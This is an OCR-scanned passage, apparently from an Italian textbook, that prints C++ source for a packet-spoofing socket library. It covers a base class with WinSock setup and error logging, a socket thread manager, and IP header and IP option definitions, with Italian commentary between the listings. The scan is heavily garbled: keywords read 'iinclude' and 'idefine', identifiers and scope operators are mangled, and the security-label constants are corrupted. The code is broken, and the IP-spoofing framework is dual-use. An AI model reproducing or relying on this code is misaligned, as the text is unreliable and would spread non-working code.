static BOOL InitializeSockets (BOOL bMultiThreaded=FALSE, int 
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//Shutdown the sockets 
static BOOL ShutdownSockets () ; 
//Get the last error 
int GetLastError ( ) ; 
//ctor and dtor 
CSpoofBase () ; 
virtual ~CSpoofBase(); 
protected: 

//Get the number of threads 

static int GetNumberOf Threads () ; 

//Are we multithreaded 

static BOOL IsMultiThreaded() ; 

//Report an unknown error (use GetLastError) 

void ReportError (LPCSTR lpMethod) ; 

//Report an unknown error (use GetLastError) 

static void ReportStaticError (LPCSTR lpClass , LPCSTR lpMethod) ; 
/ /Report an unknown error (use GetLastError) 

static void ReportStaticError (LPCSTR lpClass , LPCSTR lpMethod, LPCSTR lpMessage) ; 

//Shutdown notifier 

virtual void NotifyShutdown () ; 

//Register shutdown class 

void RegisterShutdown (CSpoofBase* pBase) ; 
/ /Report an error 

void ReportError (LPCSTR lpMethod, LPCSTR lpMessage) ; 
//Report and error 

virtual void ReportError (LPCSTR lpMethod, int iErrorCode) ; 

//Set the name of the current class 

void SetName (LPCSTR IpName) ; 

//Set the socket last error 

void SetLastError (LPCSTR lpMethod) ; 

void SetLastError (LPCSTR lpMethod, int iErrorCode) ; 
private: 

//Get the correct log 
CSpoofLog* GetLogO; 
//Last error we had 
int mLastError; 
//Our log 

static CSpoofLog* m_Log; 
//If we have a locai log 
CSpoofLog* m_LocalLog; 
//Are we initialized 
static BOOL m_Initialized; 
//Our class name 
LPSTR m_lpClassName; 
//Class to notify 

static CSpoofBase* m_pShutdownClass ; 

//Are we multithreaded 

static BOOL m__bMultiThreaded; 

//Number of threaded 

static int m_NumberOf Threads ; 



// SpoofBase . cpp : implementation of the CSpoofBase class. 

iinclude "stdafx.h" 
iinclude "SpoofBase . h" 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

// CSpoofLog start 

CSpoofBase : : CSpoofLog* CSpoofBase : :m_Log=NULL; 

CSpoofBase : -.CSpoofLog: -.CSpoofLog () 

{ 

} 

CSpoofBase : : CSpoofLog: : ~CSpoofLog () 

i 

} 

// CSpoofLog end 

BOOL CSpoofBase : :m_bMultiThreaded=FALSE; 
BOOL CSpoofBase : :m_Initialized=FALSE; 
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CSpoofBase : : CSpoofBase () 
{ 

try 
{ 



//No name 

mlpClassName=NULL; 
//Set it 

SetName ( "CSpoofBase ") ; 

//No locai log 
m_LocalLog=NULL ; 

} 

ERROR_HANDLER ( "CSpoofBase ") 



} 



CSpoofBase : : ~CSpoofBase ( ) 
{ 

try 
{ 

//Dispose of the name 
free (m_lpClassName) ; 

} 

ERROR_HANDLER ( "~CSpoofBase ") 

} 

void CSpoofBase : : SetLastError (LPCSTR lpMethod) 
{ 



try 
{ 



//First set the error 
m_LastError=WSAGetLastError () ; 



//Check if there is an error 
if (m^LastError) 

ReportError (m_lpClassName , mLastError) ; 

} 

ERROR_HANDLER ( "SetLastError") 



void CSpoofBase: : SetLastError (LPCSTR lpMethod, int iErrorCode) 
{ 



try 
{ 



//First set the error 
m_LastError=iErrorCode ; 



//Check if there is an error 
if (m LastError) 

ReportError (m_lpClassName , mJLastError) ; 

} 

ERROR_HANDLER ( "SetLastError") 



} 



void CSpoofBase :: SetName (LPCSTR IpName) 
{ 

try 
( 

//if exists dispose of it 
if (m IpCIassName) 

free (m IpCIassName) ; 

m_lpClassName=strdup (IpName) ; 

} 

ERROR_HANDLER ( "SetName ") 

} 

void CSpoofBase: : ReportError (LPCSTR lpMethod, int iErrorCode) 
{ 

if (ÌGetLogO) 
return; 

try 
{ 

//Get the log 
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pLog=GetLog () ; 
//Report to the log 

pLog->ReportSocketError (m_lpClassName, lpMethod, iErrorCode) ; 

} 

catch ( . . . ) 
l 

//Can't do anything to avoid circular catch 

} 

} 



void CSpoofBase : :ReportError (LPCSTR lpMethod, LPCSTR lpMessage) 
{ 

if (IGetLogO) 
return; 



} 



try 
{ 



CSpoofLog* pLog; 
pLog=GetLog () ; 

//Report to the log 

pLog->ReportInitlatedError (m^lpClassName, lpMethod, lpMessage) ; 



ì 

catch ( . . . ) 
{ 

} 



//Can't do anything to avoid circular catch 



int CSpoofBase : : GetLastError () 
{ 

return m__LastError; 

} 



BOOL CSpoofBase : : InitializeSockets (BOOL bMultiThreaded, int iNumberOfThreads) 
{ 

//To avoid doublé initialize 
if (m_Initialized) 
return TRUE; 



try 
{ 

//Initialize the sockets 
WORD wVersionRequested; 
WS ADATA wsaData; 
int err; 



wVersionRequested = MAKEWORD ( 2, 2 ) ; 

err = WSAStartup ( wVersionRequested, SwsaData ); 
if (err !=0) 

/* Teli the user that we could not find a usable */ 
/* WinSock DLL. */ 
return FALSE; 

/* Confina that the WinSock DLL supports 2.2.*/ 

/* Note that if the DLL supports versions greater */ 

/* than 2.2 in addition to 2.2, it will stili return */ 

/* 2.2 in wVersion since that is the version we */ 

/* requested. */ 

if (LOBYTE (wsaData. wVersion) ! =2 // HIBYTE (wsaData .wVersion) !=2) 
{ 

/* Teli the user that we could not find a usable */ 
/* WinSock DLL. */ 
WSACleanup () ; 
return FALSE; 

) 



//Save the threading Information 
m_bMultiThreaded=bMultiThreaded; 
m_NumberOfThreads=iNumberOfThreads; 



//And we are initialized 
m_Initialized=TRUE ; 
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return TRUE; 

} 

catch ( . . . ) 
{ 

return FALSE; 

} 

} 

BOOL CSpoofBase : : ShutdownSockets () 
{ 

//Only if initialized 
if ( !m_In±tialized) 
return TRUE; 

try 
{ 

//Notify shutdown class 
if (mpShutdownClass) 
{ 

m_pShutdownClass->NotifyShutdown () ; 
delete m _pShutdownClass ; 

} 

if (WSACleanup()==SOCKET_ERROR) 
return FALSE; 

m_Initialized=FALSE; 
return TRUE; 

} 

catch ( . . . ) 
{ 

return FALSE; 

} 



} 



void CSpoofBase : :NotifyShutdown () 

{ 

} 

void CSpoofBase : :RegisterShutdown (CSpoofBase* pBase) 
{ 

try 
{ 

//Check if we already have a class 
if (m pShutdownClass) 

delete m _pShutdownClass ; 

m_pShutdownClass=pBase; 

} 

ERROR_HANDLER ( "RegisterShutdown ") 



CSpoofBase* CSpoofBase : :m _pShutdownClass=NULL; 

void CSpoof Base :: SetLog (CSpoof Log *pLog) 
{ 

//Save the new log 
m_Log=pLog ; 

} 

void CSpoofBase : -.ReportError (LPCSTR lpMethod) 
{ 

if (ÌGetLogO) 
return; 



try 
{ 



//Unknown error 
LPVOID lpMsgBuf; 

FormatMessage ( 

FORMAT_MESSAGE_ALLOCATE_BUFFER / 
FORMAT_MESSAGE_FROM_SYSTEM / 
FORMAT_MESSAGE_IGNORE_INSERTS, 
NULL, 
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MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT) , // Default language 
(LPTSTR) SlpMsgBuf, 

0, 

NULL) ; 

//Report the error 
//Get the log 

GetLog () ->ReportCatchError (m_lpClassName, lpMethod, (LPSTR) lpMsgBuf) ; 

//Free the resources 
LocalFree (lpMsgBuf) ; 

} 

catch ( . . . ) 

{ 

} 



char FAR * CSpoo f Base :: LongToString (long lAddr) 
{ 



try 
{ 

//First create the address 
in_addr addr; 

//Assign it 

addr. S_un . S_addr=lAddr ; 

//Return the value 
return inet_ntoa (addr) ; 

} 

ERROR_HANDLER_RETURN ( "LongToSt ring", NULL ) 



CSpoofBase : : CSpoofLog* CSpoofBase : : GetLog () 
{ 

try 
{ 

if (m_LocalLog) 

return m_LocalLog; 

else 

return m__Log; 

} 

catch ( . . . ) 
{ 

return NULL; 

} 



void CSpoo f Base :: SetLocalLog (CSpoo f Log *pLog) 
m_LocalLog=pLog ; 

BOOL CSpoofBase : : IsMultiThreaded () 
return m_bMultiThreaded; 

int CSpoofBase : : GetNumberOfThreads ( ) 
return m__NumberOfThreads; 

void CSpoofBase: -.ReportStaticError (LPCSTR lpClass, LPCSTR lpMethod) 

if ( !m_Log) 

return; 



try 
( 



//Unknown error 
LPVOID lpMsgBuf; 

FormatMessage ( 

FORMAT_MESSAGE_ALLOCATE_BUFFER / 
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FORMAT_MESSAGE_IGNORE_INSERTS, 
NULL, 

: : GetLastError ( ) , 

MAKELANGID (LANG_NEUTRAL, SUBLANG^DEFAULT) , // Default language 
(LPTSTR) SlpMsgBuf, 

0, 

NULL) ; 
//Report the error 

m_Log->ReportCatchError (IpClass , lpMethod, (LPSTR) lpMsgBuf) ; 

//Free the resources 
LocalFree (lpMsgBuf) ; 

} 

catch ( . . . ) 

{ 

} 



} 



void CSpoofBase : : ReportStaticError (LPCSTR IpClass, LPCSTR lpMethod, LPCSTR lpMessage) 
{ 

if (m_Log) 

return; 

try 
{ 

//Report to the log 

m_Log->ReportInitiatedError (IpClass, lpMethod, lpMessage) ; 

} 

catch ( . . . ) 
{ 

//Can 't do anything to avoid circular catch 

} 

} 

La definizione dei dati e dei metodi di CspoofBase 

11 Data I t e m s 



static BOOL 
static BOOL 
int 

CSpoofLog * 

static CSpoofLog * 

LPSTR 

static int 

static CSpoofBase * 



m__bMultiThreaded 

m^Initialized 

mLastError 

m_LocalLog 

m_Log 

mlpClassName 
mNumberOfThreads 
m _pShutdownClass 



Are we multithreaded 
Are we initialized 
Last error we had 
If we have a locai log 
Construction/Destruction 
Our class name 
Number of threaded 
Class to notify 



Constructors 



CSpoofBase () ctor and dtor 

CSpoofLog : : CSpoofLog ( ) 




Destructors 



virtual ~CSpoofBase () 

CSpoofLog: : ~CSpoofLog () CSpoofLog end 




Functions 



int GetLastError ( ) Get the last error 

CSpoofBase: : CSpoofLog * GetLog Q Get the correct log 
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static int 
static BOOL 

static BOOL 
char FAR * 
virtual void 
void 

void 

void 

virtual void 
static void 
static void 

void 

void 

void 
void 
void 



GetNumberOfThreads () 

InitializeSockets ( BOOL 
bMultiThreaded=FALSE, int 
iNumberOfThreads=0 ) 

IsMul t i Threaded ( ) 

LongToString ( long lAddr ) 

NotifyShutdown () 

RegisterShutdown ( CSpoofBase* 
pBase ) 

ReportError ( LPCSTR lpMethod ) 

ReportError ( LPCSTR lpMethod, 
LPCSTR lpMessage ) 

ReportError ( LPCSTR lpMethod, int 
iErrorCode ) 

ReportStaticError ( LPCSTR 
lpClass, LPCSTR lpMethod ) 

ReportStaticError ( LPCSTR 
lpClass, LPCSTR lpMethod, LPCSTR 
lpMessage ) 

SetLastError ( LPCSTR lpMethod ) 

SetLastError ( LPCSTR lpMethod, 
int iErrorCode ) 

SetLocalLog ( CSpoofLog* pLog ) 

SetLog ( CSpoofLog* pLog ) 

SetName ( LPCSTR IpName ) 



Get the number of 
threads 

Initialize the sockets 



Are we multithreaded 
Convert long to string 
Shutdown notifier 
Register shutdown class 

Report an unknown error 
(use GetLastError) 

Report an error 

Report and error 

Report an unknown error 
(use GetLastError) 

Report an unknown error 
(use GetLastError) 

Set the socket last 
error 



Set the locai log 

Save a new log 

Set the name of the 
current class 



static BOOL 



ShutdownSockets ( ) 



Shutdown the sockets 



La funzione di base è quella utilizzata per la creazione di quasi tutte le altre classi. 

Come abbiamo già visto nei capitoli legati alla programmazione la Classe è di fatto un 

involucro un cui bengono definiti i dati e i metodi indirizzati alla gestione di qualche cosa di 

particolare che in questo caso è appunto la connessione eseguita tramite socket. 

Tra i dati mantenuti dentro a questa classe troviamo il nome stesso della classe, alcuni flag 

che indicano se deve essere trattato il log. 

L'inizializzazione del Socket viene eseguita con la classica funzione vista nel capitolo legato a 
WSocket2. 



err = WSAStartup( wVersionRequested, SwsaData ); 



Al contrario lo shutdown del socket vien4e eseguito tramite la funzione : 



if (WSACleanup ( ) ==SOCKET_ERROR) . . . 



Altri metodi interni a questa classe sono orientati alla gestione degli errori. 

La classe può essere utilizzata per la creazione di sistemi multithread per cui alcuni dati 

interni alla classe hanno lo scopo di supportare tale funzionalità. 

Partendo dalla classe appena vista ne vengono create un certo numero di altre come ad 
esempio la seguente ovvero CSocketThreadManager: 

iinclude "SpoofBase . h" 

class CSocketThreadManager : public CSpoofBase 
{ 

public : 

//Less socket in the system 

void DecreaseSocketCount (HWND hWindowHandle) ; 
//Get the window handle 
HWND GetWindowHandle () ; 
//et or and dtor 

CSocketThreadManager (int iThreadCount , HINSTANCE hlnstance) ; 
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virtual ~CSocketThreadManager ( ) ; 
private: 

//Get the socket array position by the window handle 
int GetlndexByHWND (HWND hHandle) ; 
//Get the freeiest thread 
int GetMostAvailableThreadf) ; 
//Our thread function 

static DWORD WINAPI SocketThread (LPVOID IpParameter) ; 

//Spawn the threads 

void SpawnThreads () ; 

//Our thread data 

typedef struct _ThreadData 

{ 

HWND hWindowHandle; 

int iSocketCount ; 

HANDLE hThreadHandle; 

DWORD dwThreadID; 

HINSTANCE hlnstance; 

HANDLE hEvent; 
} ThreadData; 
//Our thread count 
int m_iThreadCount ; 
//Our Windows struct 
ThreadData* m_pThreadData; 
//Our instance 
HINSTANCE m_hlnstance; 
//Our criticai section 
CRITICAL_SECTION m^pCSection; 



// SocketThreadManager . cpp 

iinclude "stdafx.h" 

iinclude " SocketThreadManager . h " 

iinclude "AsyncSocket . h " 



////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 
idefine CSocketThreadManager_Class "CSocketThreadManager" 

CSocketThreadManager : : CSocketThreadManager (int iThreadCount , HINSTANCE hlnstance) : 
CSpoofBase () , 



m_iThreadCount (iThreadCount) , 



m_hlnstance (hlnstance) 
{ 

try 
{ 

//Set the class name 

SetName (CSocketThreadManager__Class) ; 

//Set our memeber 
m_pThreadData=NULL ; 

//Start spawning threads 
SpawnThreads () ; 

//Create the criticai section 
InitializeCriticalSection (&m _pCSection) ; 

} 

ERROR_HANDLER ( "CSocket ThreadManager ") 

} 



CSocket ThreadManager : : ~CSocket ThreadManager ( ) 
{ 

try 
{ 

//Release the criticai section 
DeleteCriticalSection (SmpCSection) ; 

//Delete the thread data 
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for (int iCounter=0 ; iCounter<=m_iThreadCount ; ++iCounter) 
//Post a stop message 

if (m_j>ThreadData [iCounter] . hThreadHandle) 
{ 

PostThreadMessage (m_pThreadData [iCounter] . dwThreadID, WM_QUIT, 0, 0) ; 

//Delete the window 

DestroyWindow (m pThreadData [ iCounter] . hWindowHandle) ; 
} 

//Delete the structure 
delete [] m_jpThreadData ; 

} 

) 

ERROR^HANDLER ( "~CSocketThreadManager") 

ì 

void CSocketThreadManager : : SpawnThreads < ) 
{ 

try 
{ 

//Start creating threads 
//Allocate the thread structure 
m__pThreadData=new ThreadData [ni_iThreadCount ] ; 

//And initialize it 

memset (m_pThreadData , 0, sizeof (ThreadData) *m iThreadCount ) ; 

//Wait for ali threads 
HANDLE* pHandle; 

pHandle=new HANDLE [m_iThreadCount ] ; 
//Reset them 

memset (pHandle, 0, sizeof (HANDLE) *m__iThreadCount) ; 
//Start spawning 

for (int iCounter=0; iCounter <m_iThreadCount ; ++iCounter) 
{ 

//Create an event 
m_pThreadData [iCounter] . hEvent=CreateEvent (NULL, FALSE, FALSE, NULL) ; 
//Save it to our array 

pHandle [ iCounter ] =m pThreadData [iCounter ] . hEvent; 
//Set our instance 

m pThreadData [iCounter] . hlnstance=m hlnstance; 
//And create it 

m_j>ThreadData [iCounter ] . hThreadHandle=CreateThread (NULL, 
0, 

Socket Thread, 

(LPVOID) (m_j>ThreadData+iCounter) , 

0, 

&m_pThreadData [iCounter ] . dwThreadID) ; 

//Check the thread has been created 

if ( ! m_pThreadData [ iCounter] . hThreadHandle) 

( 

//Report the error 

ReportError ("SpawnThreads" , "Failed to create thread!"); 

//Delete the handle array 
delete [] pHandle; 

//Quit 
return; 
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//Wait for ali the handles to finish 
if 

(WaitForMultipleObjectsEx (m_iThreadCount , pHandle , TRUE, 10000, FALSE) ==WAIT__TIMEOUT) 
//Report the error 

ReportErr or (" SpawnThreads "," Timeout waiting for threads!"); 
//Release ali the events 

for (iCounter=0 ; iCounter<m_iThreadCount ; ++iCounter) 
CloseHandle (pHandle [ iCounter] ) ; 

//Delete ali the handles 
delete [] pHandle; 

} 

ERROR_HANDLER ( "SpawnThreads ") 

ì 

DWORD WINAPI CSocketThreadManager : : SocketThread (LPVOID IpParameter) 
{ 

try 
{ 

//Get the address of our data 

ThreadData* pData; 

pData= (ThreadData*) IpParameter ; 

//Create the window 
pData- 

>hWindowHandle=CreateWindowEx (0, CAsyncSocket_Class, SOCKET_WINDOW_NAME , 

WS_OVERLAPPED, 0, 0, 0, 0, 0, NULL,pData->hInstance, NULL) ; 

//Alert we are done 
SetEvent (pData->hEvent) ; 

//Check we have this window 
if (pData->hWindowHandle) 
{ 

//Run a message map 
MSG msg; 

while (GetMessage (&msg, NULL, 0, 0) ) 
{ 

//Translate and dispatch 
TranslateMessage (&msg) ; 
DispatchMessage (Smsg) ; 

} 

} 

return FALSE; 

} 

ERROR__HANDLER_STATIC_RETURN (CSocket ThreadManager_Class , "Socket Thread ", TRUE) 

) 

int CSocketThreadManager: : GetMostAvailableThread () 
{ 



try 
{ 



int ilndex; 
ilndex=0; 



//Start searching the threads 

for (int iCounter=l; iCounter <m__iThreadCount ; ++iCounter) 
//Check is it larger 
if 

(m_pThreadData [iCounter] . iSocketCount<m pThreadData [ilndex] . iSocketCount SS 
m_pThreadData [ iCounter] . hThreadHandle) 

//Set the new index 

Hndex=iCounter ; 

//Return the value 
return ilndex+l; 

} 

ERROR_HANDLER_RETURN( "GetMostAvailableThread", 0) 

ì 

HWND CSocketThreadManager: : GetWindowHandle ( ) 
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try 
{ 

//Shared resource 

EnterCriticalSection ( &m_pCSection) ; 

//Get the freeiest index 
int ilndex; 

Hndex=GetMostAvailableThread ( ) ; 

//Check it 's valid 

if (! ilndex) 

{ 

//Leave the criticai section 
LeaveCriticalSection (&m _j>CSection) ; 

//Quit 
return 0; 



//Increase the socket count 
++m__pThreadData [ilndex-l ] . iSocketCount ; 

//Leave the criticai section 
LeaveCriticalSection (Sm _pCSection) ; 

return m_pThreadData [ilndex— 1 ] . hWindowHandle; 

} 

ERROR_HANDLER ( "GetWindowHandle ") 

//Quit from the criticai section 
LeaveCriticalSection (&m_pCSection) ; 



return 0; 



void CSocketThreadManager : : DecreaseSocketCount (HWND hWindowHandle) 
{ 

try 
{ 

//First find the window handle 
int ilndex; 

Hndex=GetIndexByHWND (hWindowHandle) ; 

//Check it ' s valid 
if (Ulndex) 

return; 

//Enter the criticai section 
EnterCriticalSection (Sm _pCSection) ; 

/ /Decrement the socket count 

if (m_pThreadData [ ilndex-l ] . iSocketCount>0) 

— m_pThreadData [ ilndex— 1 ] . iSocketCount ; 

//Leave the criticai section 
LeaveCriticalSection (&m_jpCSection) ; 

return; 

} 

ERROR_HANDLER ( "DecreaseSocketCount ") 

//Error, release the criticai section 
LeaveCriticalSection (&m_pCSection) ; 



} 



int CSocketThreadManager : : GetlndexByHWND (HWND hHandle) 
{ 

try 
{ 

for (int iCounter=0 ; iCounter<m_iThreadCount ; ++iCounter) 

if (m_pThreadData [iCounter] . hWindowHandle==hHandle ) 
//Return it 
return iCounter+1; 

//Nothing 
return 0; 
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ERROR_HANDLER_RETURN ( "GetlndexByHWND ", 0) 



I membri della classe sono : 



Base C 1 a s s e s 



CSpoofBase 



Data I t e m s 



HINSTANCE 
int 

CRITICAL_SECTION 
ThreadData * 



mhlnstance 
m iThreadCount 
m pCSection 
m_pThreadData 



Our instance 
Our thread count 
Our criticai section 
Our Windows struct 



Constructors 



CSocket ThreadManager ( int iThreadCount, HINSTANCE hlnstance ) ctor and dtor 



Destructors 



virtual 



-CSocketThreadManager ( ) 



Functions 



void 
int 



DecreaseSocketCount ( HWND 
hWindowHandle ) 

GetlndexByHWND ( HWND hHandle ) 



int GetMostAvailableThread ( ) 

HWND GetWindowHandle () 

static DWORD WINAPI SocketThread ( LPVOID 

IpParameter ) 

void SpawnThreads ( ) 



Less socket in the system 

Get the socket array position 
by the window handle 

Get the freeiest thread 

Get the window handle 

Our thread function 

Spawn the threads 



Sempre dalla classe di base deriva ancyhe la classe CspoofSocket. 



iinclude "SpoofBase . h" 



typedef struct _PseudoHeader 
{ 

unsigned int SourceAddress ; 
unsigned int DestinationAddress ; 
unsigned char Zeros; 
unsigned char PTCL; 
unsigned short Length; 
} PseudoHeader; 

typedef PseudoHeader FAR * LPPseudoHeader; 

idefine PseudoHeaderLength sizeof (PseudoHeader) 

idefine tOptionType unsigned char 

typedef struct __IPOption 
{ 
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tOptlonType OptionType; 
unsigned char OptionLength; 
unsigned char OptionData; 
} IPOption; 

//IP Options flags (lbit) 
idefine IPOption_COPY 128 
idefine IPOption_DONT_COPY 0 

//IP Options class (2 bits) 
idefine IPOption_CONTROL 0 
idefine IPOption_RESERVED 2 
idefine IPOption__DEBUGGING 64 
idefine IP0ption__RESERVED2 6 

//IP options type 

/* The Type of Service provides an indication of the abstract parameters of the 
quality of service desired. These parameters are to be used to guide the selection 
of the actual service parameters when transmitting a datagram through a particular 
network. Several networks offer service precedence, which somehow treats high 
precedence traffic as more important than other traffic (generally by accepting only 
traffic above a certain precedence at time of high load) . The major choice is a 
three way tradeoff between low-delay, high-reliability , and high-throughput . 

The use of the Delay, Throughput, and Reliability indications may increase the cost 
(in some sense) of the service. In many networks better performance for one of 
these parameters is coupled with worse performance on another . Except for very 
unusual cases at most two of these three indications should be set . 

The type of service is used to specify the treatment of the datagram during its 
transmission through the internet system. Example mappings of the internet type of 
service to the actual service provided on networks such as AUTODIN II, ARPANET, 
SATNET, and PRNET is given in "Service Mappings" [8]. 

The Network Control precedence designation is intended to be used within a network 
only. The actual use and control of that designation is up to each network. The 
Internetwork Control designation is intended for use by gateway control originators 
only. 

If the actual use of these precedence designations is of concern to a particular 
network, it is the responsibility of that network to control the access to, and use 
of, those precedence designations.*/ 

idefine IPOption_END_OPTION 0 //End of option list 

idefine IPOption_NO_OPERATION 1 //Do nothing 

idefine IPOption_SECURITY 2 //Security Information 

idefine IPOption_LOOSE_ROUTING 3 //Loose routing options 

idefine IPOption_STRICT_ROUTING 9 //Strict source routing 

idefine IPOption_RECORD__ROUTE 7 //Record route on datagram 

idefine IPOption_STREAM 8 //Used to carry stream identifier 

idefine IPOption_TIMESTAMP 4 //Internet timestamp 

//IP options extensions - Security 

/*Specifies one of 16 levels of security (eight of which are reserved for future 
use) . Compartments (C field) : 16 bits 

An ali zero value is used when the Information transmitted is not compartmented . 
Other values for the compartments field may be obtained from the Defense Intelligence 
Agency. 

Handling Restrictions (H field) : 16 bits 

The values for the control and release markings are alphanumeric digraphs and are 
defined in the Defense Intelligence Agency Manual DIAM 65-19, "Standard Security 
Markings " . 

Transmission Control Code (TCC field) : 24 bits 

Provides a means to segregate traffic and define controlied communities of interest 
among subscribers. The TCC values are trigraphs, and are available from HQ DCA Code 
530. 

Must be copied on fragmentation . This option appears at most once in a datagram.*/ 
idefine IPOption_SECURITY__LENGTH 11 
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idefine IPOption_SECURITY_UNCLASSIFIED 0 

idefine IPOption_SECURITY_CONFIDENTIAL OxllllOOOlOOllOlOlb 
idefine IPOption_SECURITY_EFTO OxOllllOOOlOOllOlOb 
idefine IPOption_SECURITY__MMMM OxlOllllOOOlOOllOlb 
idefine IPOption_SECURITY_PROG OxOlOllllOOOlOOllOb 
idefine IPOption_SECURITY_RESTRICTED OxlOlOllllOOOlOOllb 
idefine IPOption_SECURITY_SECRET OxllOlOllllOOOlOOOb 
idefine IPOption_SECURITY_TOPSECRET OxOllOlOllllOOOlOlb 
idefine IPOption_SECURITY_RESERVEDl OxOOllOlOllllOOOlOb 
idefine IPOption_SECURITY_RESERVED2 OxlOOllOlOllllOOOlb 
idefine IPOption_SECURITY_RESERVED3 OxOlOOllOlOllllOOOb 
idefine IPOption_SECURITY_RESERVED4 OxOOlOOlOOlOllllOlb 
idefine IPOption_SECURITY_RESERVED5 OxOOOlOOllOlOllllOb 
idefine IPOption_SECURITY_RESERVED6 OxlOOOlOOllOlOllllb 
idefine IPOption__SECURITY_RESERVED7 OxllOOOlOOllOlOllOb 
idefine IPOption_SECURITY_RESERVED8 OxlllOOOlOOllOlOllb 



/*This option provides a way for the 16-bit SATNET stream identifier to be carried 
through networks that do not support the stream concept . 

Must be copied on fragmentation . Appears at most once in a datagram.*/ 



//IP options extensions - Stream ID 
idefine IPOption_STREAM_LENGTH 4 



/*The loose source and record route (LSRR) option provides a means for the source of 
an internet datagram to supply routing information to be used by the gateways in 
forwarding the datagram to the destination, and to record the route information. 

The option begins with the option type code. The second octet is the option length 
which includes the option type code and the length octet, the pointer octet, and 
length-3 octets of route data. The third octet is the pointer into the route data 
indicating the octet which begins the next source address to be processed. The 
pointer is relative to this option, and the smallest legai value for the pointer is 4. 

A route data is composed of a series of internet addresses . Each internet address is 
32 bits or 4 octets. If the pointer is greater than the length, the source route is 
empty (and the recorded route full) and the routing is to be based on the destination 
address field. 



If the address in destination address field has been reached and the pointer is not 
greater than the length, the next address in the source route replaces the address in 
the destination address field, and the recorded route address replaces the source 
address just used, and pointer is increased by four. 

The recorded route address is the internet module ' s own internet address as known in 
the environment into which this datagram is being forwarded. 

This procedure of replacing the source route with the recorded route (though it is in 
the reverse of the order it must be in to be used as a source route) means the option 
(and the IP header as a whole) remains a Constant length as the datagram progresses 
through the internet . 

This option is a loose source route because the gateway or host 
IP is allowed to use any route of any number of other 
intermediate gateways to reach the next address in the route. 

Must be copied on fragmentation. Appears at most once in a datagram.*/ 

/*The strict source and record route (SSRR) option provides a means for the source of 
an internet datagram to supply routing information to be used by the gateways in 
forwarding the datagram to the destination, and to record the route information. 

The option begins with the option type code. The second octet is the option length 
which includes the option type code and the length octet, the pointer octet, and 
length-3 octets of route data. The third octet is the pointer into the route data 
indicating the octet which begins the next source address to be processed. The 
pointer is relative to this option, and the smallest legai value for the pointer is 4. 

A route data is composed of a series of internet addresses. 

Each internet address is 32 bits or 4 octets. If the pointer is greater than the 
length, the source route is empty (and the recorded route full) and the routing is to 
be based on the destination address field. 



If the address in destination address field has been reached and the pointer is not 
greater than the length, the next address in the source route replaces the address in 
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address just used, and pointer is increased by four. 

The recorded route address is the internet module ' s own internet address as known in 
the environment into which this datagram is being forwarded. 

This procedure of replacing the source route with the recorded route (though it is in 
the reverse of the order it must be in to be used as a source route) means the option 
(and the IP header as a whole) remains a Constant length as the datagram progresses 
through the internet . 

This option is a strict source route because the gateway or host IP must send the 
datagram directly to the next address in the source route through only the directly 
connected network indicated in the next address to reach the next gateway or host 
specified in the route. 

Must be copied on fragmentation . Appears at most once in a datagram.*/ 

//IP options extensions - Strict routing 
idefine IPOption_STRICT_ROUTING_LENGTH 3 
idefine IPOption_STRICT_ROUTING_POINTER 4 

/*The Timestamp is a right-justified, 32— bit timestamp in milliseconds since midnight 
UT. If the time is not available in milliseconds or cannot be provided with respect 
to midnight UT then any time may be inserted as a timestamp provided the high order 
bit of the timestamp field is set to one to indicate the use of a non-standard value. 

The originating host must compose this option with a large enough timestamp data area 
to hold ali the timestamp Information expected. The size of the option does not 
change due to adding timestamps. The intitial contents of the timestamp data area 
must be zero or internet address/zero pairs. 

If the timestamp data area is already full (the pointer exceeds the length) the 
datagram is forwarded without inserting the timestamp, but the overflow count is 
incremented by one. 

If there is some room but not enough room for a full timestamp to be inserted, or the 
overflow count itself overflows, the originai datagram is considered to be in error 
and is discarded. In either case an ICMP parameter problem message may be sent to 
the source host [3]. 

The timestamp option is not copied upon fragmentation. It is carried in the first 
fragment. Appears at most once in a datagram.*/ 

//IP options extensions — Time Stamp 
idefine IPOption__TIMESTAMP_LENGTH 5 

idefine IPOption_TIMESTAMP_ONLY 0 
idefine IPOption_TIMESTAMP_EACH 1 
idefine IPOption_TIMESTAMP_PRE 2 

idefine IPOption_TIMESTAMP_SIZE 8 



typedef struct ^IpHeader 



unsigned char 
unsigned char 
unsigned short 
unsigned short 
unsigned short 
unsigned char 
unsigned char 
unsigned short 

unsigned int 
unsigned int 



HeaderLength Ver sion ; 
TypeOf Service ; 
TotalLength; 
Identification; 
Fra gmen tati onFlags ; 
TTL; 

Protocol ; 
CheckSum; 



sourcelPAddress ; 
destIP Address ; 



) IpHeader ; 

typedef IpHeader FAR * LPIpHeader; 

idefine IpHeaderLength sizeof (IpHeader) 

//Some IP constants 
/ '/Ver sion 

idefine IpVersion 4 



// Type of service 
// total length of the packet 
// unique identifier 



// flags 

// 

// protocol 



Time To Live 
(TCP, UDP etc) 



// IP Header checksum 

// Source address 

// Destination Address 
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//Service types 

idefine IpService_NETWORK_CONTROL 111 

idefine IpServi oe_ INTERNETWORK_ CONTROL 110 

idefine IpService_CRITIC_ECP 101 

idefine IpService_FLASH_OVERIDE 100 

idefine IpService_FLASH Oli 

idefine IpServi ce_ IMMEDIA TE 010 

idefine IpService_PRIORITY 001 

idefine IpService_ROUTINE 0 

//Fragmetation flag 

idefine IpFragFlag_MAY_FRAG 0x0000 
idefine IpFragFlag_MORE_FRAG 0x2000 
idefine IpFragFlag_LAST_FRAG 0x0000 
idefine IpFra gFlag__DONT_FRAG 0x4000 

//Internet protocols 
idefine IpProtocol_ICMP 1 
idefine IpProtocol_TCP 6 
idefine IpProtocol_UDP 17 

idefine IP_DEF_ TTL 128 

idefine IPOption_WRAPSIZE 4 
idefine IPOption_SIZE 40 

idefine IPOption_MAX_ROUTES 10 

typedef struct _Routing 
{ 

int iRoutes; 

unsigned long ulRoutes [IPOption_MAX_ROUTES] ; 
} tRouting; 

class CIPOptions : protected CSpoofBase 
{ 

public: 

//et or and dtor 
CIPOptions () ; 
virtual ~CIPOpt ions () ; 
private: 

//Do we autopard 
BOOL m^AutoPAD; 

//Length of the buffer 
int m_BufferLength; 

//The buffer 
char* m_Buffer; 
protected: 

//Add option route 

void AddOption Route (tOptionType tRouteType, tRouting tRoute) ; 
//Add data to the buffer 

void AddToBuffer (char* buf,int Buf Length) ; 
//Create an options prototype 

tOptionType GetOption (unsigned char CopyF 'lag, unsigned char ClassFlag, unsigned 
